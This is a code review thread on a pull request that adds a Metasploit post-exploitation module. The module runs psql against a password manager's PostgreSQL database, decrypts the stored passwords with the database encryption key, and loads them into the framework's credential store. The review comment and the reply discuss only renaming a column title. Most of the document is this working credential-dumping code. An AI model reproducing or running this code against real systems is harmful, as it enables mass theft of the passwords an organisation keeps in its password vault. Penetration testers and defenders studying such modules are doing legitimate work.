modules/post/linux/gather/password_manager.rb

```diff
@@ -0,0 +1,350 @@
+
+  def query_db(query, install_path, db_password)
+    cmd = "env PGPASSWORD=#{db_password} #{psql_path(install_path)} -w -A -t -h #{pg_host} -p #{pg_port} -U pmpuser -d PassTrix -c "
+    cmd << "\"#{query}\""
+    dlog("psql command: #{cmd}")
+
+    result, success = cmd_exec_with_result(cmd)
+    raise Rex::RuntimeError, "psql returned an error: #{result}" unless success
+
+    result
+  end
+
+  def process_key(key)
+    key = key.ljust(32)
+    key = Rex::Text.decode_base64(key) if key.length > 32
+
+    # This mimics how Java handles: new String(aeskey, 'UTF-8').toCharArray()
+    key.force_encoding('utf-8').scrub.b
+  end
+
+  def get_notesdescription(install_path, db_password, db_enc_key)
+    begin
+      cmd = 'SELECT notesdescription FROM Ptrx_NotesInfo'
+      b64_notesdescription = query_db(cmd, install_path, db_password)
+    rescue StandardError => e
+      print_error("Error while querying `Ptrx_NotesInfo` table with `psql`: #{e}")
+      return
+    end
+
+    enc_key = process_key(db_enc_key)
+    decrypt_text(b64_notesdescription, enc_key)
+  end
+
+  def dump_credentials(install_path, db_password, db_enc_key, notesdescription)
+    begin
+      cmd = "SELECT ptrx_resource.RESOURCENAME,
+                    ptrx_resource.RESOURCEURL,
+                    ptrx_password.DESCRIPTION,
+                    ptrx_account.LOGINNAME,
+                    decryptschar(ptrx_passbasedauthen.PASSWORD,\'#{notesdescription}\')
+             FROM ptrx_passbasedauthen
+             LEFT JOIN ptrx_password ON ptrx_passbasedauthen.PASSWDID = ptrx_password.PASSWDID
+             LEFT JOIN ptrx_account ON ptrx_passbasedauthen.PASSWDID = ptrx_account.PASSWDID
+             LEFT JOIN ptrx_resource ON ptrx_account.RESOURCEID = ptrx_resource.RESOURCEID"
+      passwords = query_db(cmd, install_path, db_password)
+    rescue StandardError => e
+      print_error("Error while dumping credentials with `psql`: #{e}")
+      return
+    end
+
+    enc_key = process_key(db_enc_key)
+    passwords.each_line.map do |password|
+      r_name, r_url, desc, name, pass = password.strip.split('|')
+      decrypted_password = decrypt_text(pass, enc_key)
+      ResourceCredential.new(r_name, r_url, desc, name, decrypted_password)
+    end
+  end
+
+  def report_creds(username, password)
+    credential_data = {
+      origin_type: :session,
+      post_reference_name: fullname,
+      private_data: password,
+      private_type: :password,
+      session_id: session_db_id,
+      username: username,
+      workspace_id: myworkspace_id
+    }
+    create_credential(credential_data)
+  rescue StandardError => e
+    vprint_error("Error reporting credentials `#{username}:#{password}`: #{e}")
+    elog(e)
+  end
+
+  def display_and_report(resource_credentials)
+    cred_tbl = Rex::Text::Table.new({
+      'Header' => 'Password Manager Pro Credentials',
+      'Indent' => 1,
+      'Columns' => ['Resource Name', 'Resource URL', 'Description', 'Login Name', 'Password']
```

Comment:
This isn't the biggest deal though I noticed when testing the module wasn't picking up the Description I had input when creating the resource. This field displays the `Resource Notes` that the user inputs when creating a resource.

Maybe we change the column title from `Description to ` Resource Notes`?

![Screen Shot 2022-10-28 at 1 21 55 PM](https://user-images.githubusercontent.com/23320005/198696881-dc966ebd-3fdc-488b-8b05-2426b992f9eb.png)
![Screen Shot 2022-10-28 at 1 21 01 PM](https://user-images.githubusercontent.com/23320005/198696896-65e8a780-7a0e-4395-8836-b4f78d182ca6.png)

Reply:
Absolutely, this makes sense. I'll change the column title. Thanks!